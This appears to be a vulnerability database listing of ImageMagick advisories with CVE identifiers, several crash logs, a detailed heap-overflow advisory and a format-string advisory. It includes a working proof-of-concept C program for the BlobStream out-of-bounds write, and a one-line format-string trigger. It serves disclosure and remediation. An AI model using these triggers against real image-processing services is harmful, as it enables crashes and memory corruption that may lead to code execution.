VCID-kdw5-8y5z-zya5 ImageMagick: Possible memory leak in ASHLAR encoder A memory leak in the ASHLAR image writer allows an attacker to exhaust process memory by providing a crafted image that results in small objects that are allocated but never freed. ``` ==880062== Memcheck, a memory error detector ==880062== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==880062== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info ==880062== ==880062== ==880062== HEAP SUMMARY: ==880062== in use at exit: 386,826 bytes in 696 blocks ==880062== total heap usage: 30,523 allocs, 29,827 frees, 21,803,756 bytes allocated ==880062== ==880062== LEAK SUMMARY: ==880062== definitely lost: 3,408 bytes in 3 blocks ==880062== indirectly lost: 88,885 bytes in 30 blocks ==880062== possibly lost: 140,944 bytes in 383 blocks ==880062== still reachable: 151,573 bytes in 259 blocks ==880062== suppressed: 0 bytes in 0 blocks ==880062== Reachable blocks (those to which a pointer was found) are not shown. ==880062== To see them, rerun with: --leak-check=full --show-leak-kinds=all ==880062== ==880062== For lists of detected and suppressed errors, rerun with: -s ==880062== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) ``` CVE-2026-25637
GHSA-gm37-qx7w-p258
VCID-kefv-kpkk-wudf ImageMagick has Division-by-Zero in YUV sampling factor validation, which leads to crash A logic error in YUV sampling factor validation allows an invalid sampling factor to bypass checks and trigger a division-by-zero during image loading, resulting in a reliable denial-of-service. ``` coders/yuv.c:210:47: runtime error: division by zero AddressSanitizer:DEADLYSIGNAL ================================================================= ==3543373==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x55deeb4d723c bp 0x7fffc28d34d0 sp 0x7fffc28d3320 T0) #0 0x55deeb4d723c in ReadYUVImage coders/yuv.c:210 #1 0x55deeb751dff in ReadImage MagickCore/constitute.c:743 #2 0x55deeb756374 in ReadImages MagickCore/constitute.c:1082 #3 0x55deec682375 in CLINoImageOperator MagickWand/operation.c:4959 #4 0x55deec6887ed in CLIOption MagickWand/operation.c:5473 #5 0x55deec32843b in ProcessCommandOptions MagickWand/magick-cli.c:653 #6 0x55deec32b99b in MagickImageCommand MagickWand/magick-cli.c:1392 #7 0x55deec324d58 in MagickCommandGenesis MagickWand/magick-cli.c:177 #8 0x55deead82519 in MagickMain utilities/magick.c:162 #9 0x55deead828be in main utilities/magick.c:193 #10 0x7fb90807fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #11 0x7fb90807fe3f in __libc_start_main_impl ../csu/libc-start.c:392 #12 0x55deead81974 in _start (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x22fb974) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: UNKNOWN SIGNAL coders/yuv.c:210 in ReadYUVImage ==3543373==ABORTING ``` CVE-2026-25799
GHSA-543g-8grm-9cw6
VCID-kert-7sg4-mke5 security update CVE-2017-6499
VCID-kfb4-xnqr-cya6 ImageMagick: a memory leak vulnerability in the function ReadPSImage in coders/ps.c CVE-2019-13137
VCID-khv9-9he8-ykbf security update CVE-2016-7536
VCID-knc1-7mhm-vbhn security update CVE-2016-10053
VCID-kq6x-z56m-wqhh ImageMagick: Memory leak in the function WriteCALSImage CVE-2017-12669
VCID-krca-sq7c-gfbg ImageMagick: Out-of-bounds read vulnerability in SGI Coder CVE-2016-7101
VCID-ksuz-r36k-wygy ImageMagick: convert +profile regression enters infinite loop exhausting memory CVE-2014-8561
VCID-kuyn-8jwc-qyb9 ImageMagick: incorrect usage of object after it has been destroyed CVE-2014-9852
VCID-kxus-63yw-sufe security update CVE-2018-16413
VCID-ky7v-89bx-3qc8 ImageMagick: out-of-bounds access in function LocaleLowercase in MagickCore/locale.c leads to SIGSEGV CVE-2019-10714
VCID-m2q5-rtqv-tudu ImageMagick: Stack-based buffer over-read in the ComputeResizeImage function CVE-2018-6930
VCID-m31q-v2ue-zyh1 ImageMagick: heap-buffer-overflow in ReadTIFFImage function in coders/tiff.c CVE-2018-8960
VCID-m4we-6udg-p7cj ImageMagick: heap-based buffer over-read in MagickCore/fourier.c in ComplexImages CVE-2019-13302
VCID-m9bk-66wv-vqbk security update CVE-2017-9439
VCID-m9fk-3upg-33eu security update CVE-2016-5688
VCID-mcef-v74u-pke3 ImageMagick: a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c CVE-2019-13133
VCID-mcry-3vgm-kyh1 ImageMagick: memory leak in DecodeImage in coders/pcd.c CVE-2018-14435
VCID-mg1t-vz1h-47b9 ImageMagick: Memory leak in the function ReadMATImage CVE-2017-12667
VCID-mhbe-8x14-f3d6 ImageMagick: division by zero at MagickCore/gem-private.h CVE-2020-27773
VCID-mhxv-hu2v-ukeb ImageMagick: Missing checks in the ReadDDSImage function CVE-2017-9141
VCID-mmw7-4m3z-2kcn Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-44268
VCID-mn5y-2hmf-dkgy ImageMagick: outside the range of representable values of type 'unsigned char' at coders/pdf.c CVE-2020-27771
VCID-mn7e-8e4j-dqba security update CVE-2017-11525
VCID-mpqt-5tap-57g1 security update CVE-2016-7524
VCID-mrqv-9kq9-e3h5 security update CVE-2017-6498
VCID-mt9h-kjh8-kbdu security update CVE-2017-12434
VCID-mv9q-facp-yub3 security update CVE-2016-4564
VCID-mvga-q2ts-mqdh ImageMagick: Resource exhaustion in ExtractPostscript function in coders/wpg.c CVE-2017-17682
VCID-mwf4-u6v6-zqdu ImageMagick: NULL pointer dereference in ReadOneMNGImage CVE-2017-15017
VCID-mws6-wym5-d3f6 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12418
VCID-mxg1-261s-nbds ImageMagick BlobStream Forward-Seek Under-Allocation **Reporter:** Lumina Mescuwa **Product:** ImageMagick 7 (MagickCore) **Component:** `MagickCore/blob.c` (Blob I/O - BlobStream) **Tested:** 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI **Impact:** Heap out-of-bounds **WRITE** (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution --- ## Executive Summary For memory-backed blobs (**BlobStream**), [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) permits advancing the stream **offset** beyond the current end without increasing capacity. The subsequent [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) then expands by **`quantum + length`** (amortized) instead of **`offset + length`**, and copies to `data + offset`. When `offset ≫ extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required. --- ## Affected Scope - **Versions confirmed:** 7.1.2-0, 7.1.2-1 - **Architectures:** Observed on macOS arm64; architecture-agnostic on LP64 - Paths: MagickCore blob subsystem — **BlobStream** ([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) and [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)). - **Not required:** External delegates; special policies; integer wraparound --- ## Technical Root Cause **Types (LP64):** `offset: MagickOffsetType` (signed 64-bit) `extent/length/quantum: size_t` (unsigned 64-bit) `data: unsigned char*` **Contract mismatch:** - [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) (BlobStream) updates `offset` to arbitrary positions, including past end, **without** capacity adjustment. - [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) tests `offset + length >= extent` and grows **by** `length + quantum`, doubles `quantum`, reallocates to `extent + 1`, then: ``` q = data + (size_t)offset; memmove(q, src, length); ``` There is **no guarantee** that `extent ≥ offset + length` post-growth. With `offset ≫ extent`, `q` is beyond the allocation. **Wrap-free demonstration:** Initialize `extent=1`, write one byte (`offset=1`), seek to `0x10000000` (256 MiB), then write 3–4 bytes. Growth remains << `offset + length`; the copy overruns the heap buffer. --- ## Exploitability & Reachability - **Primitive:** Controlled bytes written at a controlled displacement from the buffer base. - **Reachability:** Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract **permits** it, thus creating a latent sink for first- or third-party encoders/writers. - **Determinism:** Once a forward seek past end occurs, the first subsequent write reliably corrupts memory. --- ## Impact Assessment - **Integrity:** High - adjacent object/metadata overwrite plausible. - **Availability:** High - reliably crashable (ASan and non-ASan). - **Confidentiality:** High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process. - **RCE plausibility:** Typical of heap OOB writes in long-lived image services; allocator/layout dependent. --- ## CVSS v3.1 Rationale (9.8) - **AV:N / PR:N / UI:N** - server-side image processing is commonly network-reachable without auth or user action. - **AC:L** - a single forward seek + write suffices; no races or specialized state. - **S:U** - corruption localized to the ImageMagick process. - **C:H / I:H / A:H** - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service). _Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._ --- ## Violated Invariant > **Before copying `length` bytes at `offset`, enforce `extent ≥ offset + length` with overflow-checked arithmetic.** The BlobStream growth policy preserves amortized efficiency but fails to enforce this **per-write** safety invariant. --- ## Remediation (Principle) In [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) (BlobStream case): 1. **Checked requirement:** `need = (size_t)offset + length;` → if `need < (size_t)offset`, overflow → fail. 2. **Ensure capacity ≥ need:** `target = MagickMax(extent + quantum + length, need);` (Optionally loop, doubling `quantum`, until `extent ≥ need` to preserve amortization.) 3. **Reallocate to `target + 1` before copying;** then perform the move. **Companion hardening (recommended):** - Document or restrict [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant. - Centralize blob arithmetic in checked helpers. - Unit tests: forward-seek-then-write (success and overflow-reject). --- ## Regression & Compatibility - **Behavior change:** Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail). - **Memory profile:** Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams. --- ## Vendor Verification Checklist - Reproduce with a minimal in-memory BlobStream harness under ASan. - Apply fix; verify `extent ≥ offset + length` at all write sites. - Add forward-seek test cases (positive/negative). - Audit other growth sites (`SetBlobExtent`, stream helpers). - Clarify BlobStream seek semantics in documentation. - Unit test: forward seek to large offset on **BlobStream** followed by 1–8 byte writes; assert either growth to `need` or clean failure. --- # PoC / Reproduction / Notes ## Environment - **OS/Arch:** macOS 14 (arm64) - **Compiler:** clang-17 with AddressSanitizer - **ImageMagick:** Q16-HDRI - **Prefix:** `~/opt/im-7.1.2-0` - **`pkg-config`:** from PATH (no hard-coded `/usr/local/...`) --- ## Build ImageMagick 7.1.2-0 (static, minimal) ```bash ./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \ --disable-shared --enable-static --without-modules \ --without-magick-plus-plus --disable-openmp --without-perl \ --without-x --without-lqr --without-gslib make -j"$(sysctl -n hw.ncpu)" make install "$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt ``` --- ## Build & Run the PoC (memory-backed BlobStream) **`poc.c`:** _Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._ ```c // poc.c #include <stdio.h> #include <stdlib.h> #include <MagickCore/MagickCore.h> #include <MagickCore/blob.h> #include "MagickCore/blob-private.h" int main(int argc, char **argv) { MagickCoreGenesis(argv[0], MagickTrue); ExceptionInfo *e = AcquireExceptionInfo(); ImageInfo *ii = AcquireImageInfo(); Image *im = AcquireImage(ii, e); if (!im) return 1; // 1-byte memory blob → BlobStream unsigned char *buf = (unsigned char*) malloc(1); buf[0] = 0x41; AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0 SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf // Step 1: write 1 byte (creates BlobInfo + sets offset=1) unsigned char A = 0x42; (void) WriteBlob(im, 1, &A); fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n", (long long) TellBlob(im), (size_t) GetBlobSize(im)); // Step 2: seek way past end without growing capacity const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB (void) SeekBlob(im, big, SEEK_SET); fprintf(stderr, "[+] after seek: off=%lld len=%zu\n", (long long) TellBlob(im), (size_t) GetBlobSize(im)); // Step 3: small write → reallocation grows by quantum+length, not to offset+length // memcpy then writes to data + offset (OOB) const unsigned char payload[] = "PWN"; (void) WriteBlob(im, sizeof(payload), payload); // If we get here, it didn't crash fprintf(stderr, "[-] no crash; check ASan flags.\n"); (void) CloseBlob(im); DestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e); MagickCoreTerminus(); return 0; } ``` --- `run:` ```bash # Use the private prefix for pkg-config export PKG_CONFIG_PATH="$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH" # Strict ASan for crisp failure export ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0' # Compile (static link pulls transitive deps via --static) clang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \ $(pkg-config --cflags MagickCore-7.Q16HDRI) \ $(pkg-config --static --libs MagickCore-7.Q16HDRI) # Execute and capture ./poc 2>&1 | tee asan.log ``` **Expected markers prior to the fault:** ``` [+] after 1 byte: off=1 len=1 [+] after seek: off=268435456 len=1 ``` An ASan **WRITE** crash in [`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) follows (top frames: `WriteBlob blob.c:<line>`, then `_platform_memmove` / `__sanitizer_internal_memmove`). --- ## Debugger Verification (manual) LLDB can be used to snapshot the invariants; ASan alone is sufficient. ``` lldb ./poc (lldb) settings set use-color false (lldb) break set -n WriteBlob (lldb) run # First stop (prime write) (lldb) frame var length (lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped (lldb) continue # Second stop (post-seek write) (lldb) frame var length (lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped (lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length (lldb) expr -- (void*)((unsigned char*)image->blob->data + (size_t)image->blob->offset) # Into the fault; if inside memmove (no locals): (lldb) bt (lldb) frame select 1 (lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum ``` **Expected at second stop:** `type = BlobStream` · `offset ≈ 0x10000000` (256 MiB) · `length ≈ 3–4` · `extent ≈ 64 KiB` (≪ `offset + length`) · `quantum ≈ 128 KiB` · `mapped = MagickFalse` · `data + offset` far beyond base; next `continue` crashes in `_platform_memmove`. --- ## Credits **Reported by:** Lumina Mescuwa --- CVE-2025-57807
GHSA-23hg-53q6-hqfg
VCID-my2x-tnvf-wqbw ImageMagick: heap-based buffer overflow in ReadTIFFImage() in coders/tiff.c CVE-2021-3610
VCID-my4x-d8ru-pybj security flaw CVE-2005-0760
VCID-n22y-f9az-fubm ImageMagick: Memory leak in the WritePSDChannel function in coders/psd.c CVE-2019-7395
VCID-n47w-r932-abey ImageMagick is vulnerable to Heap Overflow when writing extremely large image profile in the PNG encoder An extremely large image profile could result in a heap overflow when encoding a PNG image. CVE-2026-30883
GHSA-qmw5-2p58-xvrc
VCID-n59p-w7sh-sbhb ImageMagick: memory leak in coders/dcm.c:ReadDCImage can cause denial of service CVE-2018-5357
VCID-n5r9-xgvu-skcg ImageMagick: Memory leak in ReadSGIImage CVE-2017-7941
VCID-n6gp-848w-nbam ImageMagick: crash on corrupted pnm file CVE-2014-9805
VCID-n7rz-ssve-t7bm security update CVE-2016-10049
VCID-ne72-mzag-2keg ImageMagick: heap buffer overflow in pdb file handling CVE-2014-9817
VCID-neaa-39c7-sfbc ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps2.c CVE-2019-16711
VCID-ngzz-mwp9-rkdv Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14139
VCID-nnmr-dnnk-qkc4 ImageMagick: Uninitialized variable in coders/mat.c:ReadMATImageV4() allows for memory corruption CVE-2018-14551
VCID-nsfn-bhe3-cbd4 security update CVE-2017-12432
VCID-nsn7-a7z8-1qcd security update CVE-2017-9501
VCID-nvea-drm5-h3au Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-1115
VCID-nvp5-dpj6-byda ImageMagick: ImageMagick: Arbitrary code execution via a crafted XBM image file CVE-2026-23876
VCID-nvpf-y2es-3fcz A vulnerability in ImageMagick allows attackers to crash the application and potentially execute arbitrary code. CVE-2006-0082
VCID-nxfx-jh82-vud3 ImageMagick: unsigned offset overflowed at MagickCore/string.c CVE-2020-27770
VCID-ny9s-4kcr-tbf4 security update CVE-2017-17879
VCID-nz2d-nk9v-f7cn ImageMagick: NULL pointer dereference in psd.c CVE-2017-6497
VCID-nzh5-tng5-8qdq ImageMagick: Memory leak in the function ReadOneJNGImage CVE-2017-12565
VCID-p2v1-1y51-cfg8 ImageMagick: Memory leak in ReadAVSImage CVE-2017-7942
VCID-p2zf-ypkv-g7ay security update CVE-2016-7515
VCID-p31j-f9s2-quh9 ImageMagick: use-after-free, heap-buffer-overflow triggered by GetPixelRed, GetPixelBlue in MagickCore/pixel-accessor.h CVE-2020-25663
VCID-p3p3-suuz-dycr ImageMagick: memory leak in ReadPCDImage function in coders/pcd.c CVE-2017-18251
VCID-p3vh-b6jn-f3e2 ImageMagick: memory leak in SVGKeyValuePairs of coders/svg.c that leads to denial of service via crafted image file CVE-2019-10649
VCID-p4yb-mqca-v7c8 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2021-4219
VCID-p5aw-n691-nkff ImageMagick: MSL image stack index may fail to refresh, leading to leaked images Sometimes msl.c fails to update the stack index, so an image is stored in the wrong slot and never freed on error, causing leaks. ``` ==841485==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13512 byte(s) in 1 object(s) allocated from: #0 0x7ff330759887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 ``` CVE-2026-25988
GHSA-782x-jh29-9mf7
VCID-p5f8-45e4-ybex ImageMagick: NULL pointer dereference in ReadOneJNGImage function CVE-2017-11750
VCID-p6m5-ntbm-auct ImageMagick: outside the range of representable values of type 'float' at MagickCore/quantum.h CVE-2020-27767
VCID-p84t-bztf-cqdz Multiple vulnerabilities have been discovered in ImageMagick, possibly resulting in arbitrary code execution or a Denial of Service. CVE-2007-4986
VCID-paf4-ycea-buae ImageMagick: memory leak in function WriteOnePNGImage in coders/png.c CVE-2017-17884
VCID-pbvz-djcm-67eh Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5511
VCID-pcme-bwan-3bcf ImageMagick has NULL Pointer Dereference in ClonePixelCacheRepository via crafted image A NULL pointer dereference in ClonePixelCacheRepository allows a remote attacker to crash any application linked against ImageMagick by supplying a crafted image file, resulting in Denial of Service. ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3704942==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x7f9d141239e0 bp 0x7ffd4c5711e0 sp 0x7ffd4c571148 T0) #0 0x7f9d141239e0 (/lib/x86_64-linux-gnu/libc.so.6+0xc49e0) #1 0x558a25e4f08d in ClonePixelCacheRepository._omp_fn.0 MagickCore/cache.c:784 #2 0x7f9d14c06a15 in GOMP_parallel (/lib/x86_64-linux-gnu/libgomp.so.1+0x14a15) #3 0x558a25e43151 in ClonePixelCacheRepository MagickCore/cache.c:753 #4 0x558a25e49a96 in OpenPixelCache MagickCore/cache.c:3849 #5 0x558a25e45117 in GetImagePixelCache MagickCore/cache.c:1829 #6 0x558a25e4dde3 in SyncImagePixelCache MagickCore/cache.c:5647 #7 0x558a256ba57d in SetImageExtent MagickCore/image.c:2713 ``` CVE-2026-25798
GHSA-p863-5fgm-rgq4
VCID-ph82-atva-6kgd ImageMagick: assertion failure in MogrifyImageList function in MagickWand/mogrify.c CVE-2017-18252
VCID-pj8s-qad1-6qdu security update CVE-2019-13306
VCID-pjm4-2g47-4qau Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2023-1906
VCID-pk4j-w1q9-vqd2 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2023-34151
VCID-pmpn-drv8-9ude ImageMagick: NULL pointer dereference in ReadSVGImage() in coders/svg.c CVE-2021-3596
VCID-pnk5-26uq-w3cu ImageMagick: use-after-free in ReadOneMNGImage function in coders/png.c CVE-2017-18272
VCID-pnpw-8utk-uua7 security update CVE-2016-7532
VCID-pp81-c241-rbb5 ImageMagick: use-after-free in magick/blob.c resulting in a denial of service CVE-2019-14980
VCID-ps6p-v38m-6qe3 ImageMagick: Memory exhaustion in ReadSUNImage function in coders/sun.c CVE-2017-12435
VCID-psf6-cvdn-h3b1 ImageMagick: heap buffer overflow in coders/tiff.c CVE-2020-27829
VCID-ptej-pfyn-z3aq ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c CVE-2020-27766
VCID-pthp-wza7-hkgm ImageMagick: Memory exhaustion in ReadOneJNGImage function in coders\png.c CVE-2017-12643
VCID-punt-nwt4-uqea security update CVE-2017-12671
VCID-pwhs-ep5j-pqa7 ImageMagick: off-by-one read in formatIPTCfromBuffer function in coders/meta.c CVE-2019-10131
VCID-px2h-8ag6-s3ec security update CVE-2016-7540
VCID-pyd8-6ykz-yka7 security update CVE-2016-5691
VCID-pydk-g827-guc5 ImageMagick: NULL pointer dereference in the sixel_output_create function CVE-2017-14625
VCID-q2zg-jh8m-tua2 ImageMagick: memory exhaustion in the function ReadTIFFImage in coders/tiff.c CVE-2017-18028
VCID-q37s-1azj-xkhv ImageMagick: Memory leak in Magick::Draw CVE-2023-39978
VCID-q3v4-jztv-9bbs imagemagick: memory leak vulnerability in function WriteDPXImage in coders/dpx.c CVE-2019-12975
VCID-q5su-zt4m-sqgx ImageMagick: out-of-bounds memory access in PCX parser CVE-2014-8355
VCID-qc16-r3cs-cbdr ImageMagick: Prevent NULL pointer access in magick/constitute.c CVE-2015-8898
VCID-qda9-n7gh-c7c4 imagemagick: memory leak vulnerability in function ReadPCLImage in coders/pcl.c CVE-2019-12976
VCID-qjrj-rdqd-uqdy security update CVE-2018-5248
VCID-qkw5-9mqc-a7a3 security update CVE-2015-8957
VCID-qkwb-2fep-gba7 security update CVE-2016-7531
VCID-qp4x-w3fe-hyer ImageMagick: memory leak in WriteGIFImage function in coders/gif.c CVE-2017-18254
VCID-qrqm-h5se-1kep ImageMagick: memory leaks in AcquireMagickMemory CVE-2019-13301
VCID-qsna-fp92-syce security flaw CVE-2004-0981
VCID-qtmc-prbr-jbc9 ImageMagick: out-of-bounds memory access in resize code CVE-2014-8354
VCID-qu7h-g9ku-pkct ImageMagick: Memory leak in the ReadMPCImage function CVE-2017-9409
VCID-qu7p-k327-6uht security update CVE-2016-10252
VCID-qxe7-vuy5-9ycg Multiple buffer overflows have been discovered in ImageMagick, which could potentially result in the execution of arbitrary code. CVE-2006-4144
VCID-qye1-pv1p-8fbp ImageMagick: Memory allocation failure in AcquireMagickMemory (incomplete fix for CVE-2016-8862) CVE-2016-8866
VCID-r1uc-e1w7-kyda Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-3213
VCID-r3vw-ncns-cqgb ImageMagick is vulnerable to heap buffer over-write on 32-bit systems in SFW decoder An overflow on 32-bit systems can cause a crash in the SFW decoder when processing extremely large images. CVE-2026-31853
GHSA-56jp-jfqg-f8f4
VCID-r5v1-hra4-c3ce Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5507
VCID-r889-wzc7-1yem ImageMagick has a Format String Bug in InterpretImageFilename leads to arbitrary code execution ## Summary A format string bug vulnerability exists in `InterpretImageFilename` function where user input is directly passed to `FormatLocaleString` without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution. <br> ## Details ### root cause ``` MagickExport size_t InterpretImageFilename(const ImageInfo *image_info, Image *image,const char *format,int value,char *filename, ExceptionInfo *exception) { ... while ((cursor=strchr(cursor,'%')) != (const char *) NULL) { const char *q = cursor; ssize_t offset = (ssize_t) (cursor-format); cursor++; /* move past '%' */ if (*cursor == '%') { /* Escaped %%. */ cursor++; continue; } /* Skip padding digits like %03d. */ if (isdigit((int) ((unsigned char) *cursor)) != 0) (void) strtol(cursor,(char **) &cursor,10); switch (*cursor) { case 'd': case 'o': case 'x': { ssize_t count; count=FormatLocaleString(pattern,sizeof(pattern),q,value); if ((count <= 0) || (count >= MagickPathExtent) || ((offset+count) >= MagickPathExtent)) return(0); (void) CopyMagickString(p+offset,pattern,(size_t) (MagickPathExtent- offset)); cursor++; break; } ``` When the InterpretImageFilename function processes a filename beginning with format specifiers such as %d, %o, or %x, the filename string is directly passed as a parameter to the FormatLocaleString function. <br> ``` MagickExport ssize_t FormatLocaleString(char *magick_restrict string, const size_t length,const char *magick_restrict format,...) { ssize_t n; va_list operands; va_start(operands,format); n=FormatLocaleStringList(string,length,format,operands); va_end(operands); return(n); } ``` ``` MagickPrivate ssize_t FormatLocaleStringList(char *magick_restrict string, const size_t length,const char *magick_restrict format,va_list operands) { ... n=(ssize_t) _vsnprintf_l(string,length,format,locale,operands); ``` Inside FormatLocaleString, the variable argument list is initialized through va_start, after which the format string processing occurs by interpreting the format specifiers and using corresponding values from CPU registers and the call stack as arguments for the formatting operations. <br> ## PoC ### 1. Heap overflow read tested on development container ``` root@9184bf32bd0f:/workspaces/ImageMagick# mogrify %o%n ================================================================= ==55653==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000001 at pc 0x5bdccaae689e bp 0x7fff6882c410 sp 0x7fff6882c408 READ of size 8 at 0x603000000001 thread T0 #0 0x5bdccaae689d in SplaySplayTree splay-tree.c #1 0x5bdccaae865e in GetValueFromSplayTree (/ImageMagick/bin/magick+0x59165e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #2 0x5bdccaa8e47b in GetImageOption (/ImageMagick/bin/magick+0x53747b) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #3 0x5bdccaa63c39 in SyncImageSettings (/ImageMagick/bin/magick+0x50cc39) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #4 0x5bdccaa63036 in AcquireImage (/ImageMagick/bin/magick+0x50c036) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #5 0x5bdccaa70cc4 in SetImageInfo (/ImageMagick/bin/magick+0x519cc4) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #6 0x5bdccae42e13 in ReadImages (/ImageMagick/bin/magick+0x8ebe13) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #7 0x5bdccb11ee08 in MogrifyImageCommand (/ImageMagick/bin/magick+0xbc7e08) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #8 0x5bdccb103ca9 in MagickCommandGenesis (/ImageMagick/bin/magick+0xbacca9) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #9 0x5bdccaa5f939 in main (/ImageMagick/bin/magick+0x508939) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #10 0x73b2102b2d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd) #11 0x73b2102b2e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd) #12 0x5bdcca99f404 in _start (/ImageMagick/bin/magick+0x448404) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) 0x603000000001 is located 15 bytes to the left of 24-byte region [0x603000000010,0x603000000028) allocated by thread T0 here: #0 0x5bdccaa2224e in malloc (/ImageMagick/bin/magick+0x4cb24e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171) #1 0x73b21031915a (/lib/x86_64-linux-gnu/libc.so.6+0x9015a) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd) SUMMARY: AddressSanitizer: heap-buffer-overflow splay-tree.c in SplaySplayTree Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000:[fa]fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8010: 00 00 fa fa 00 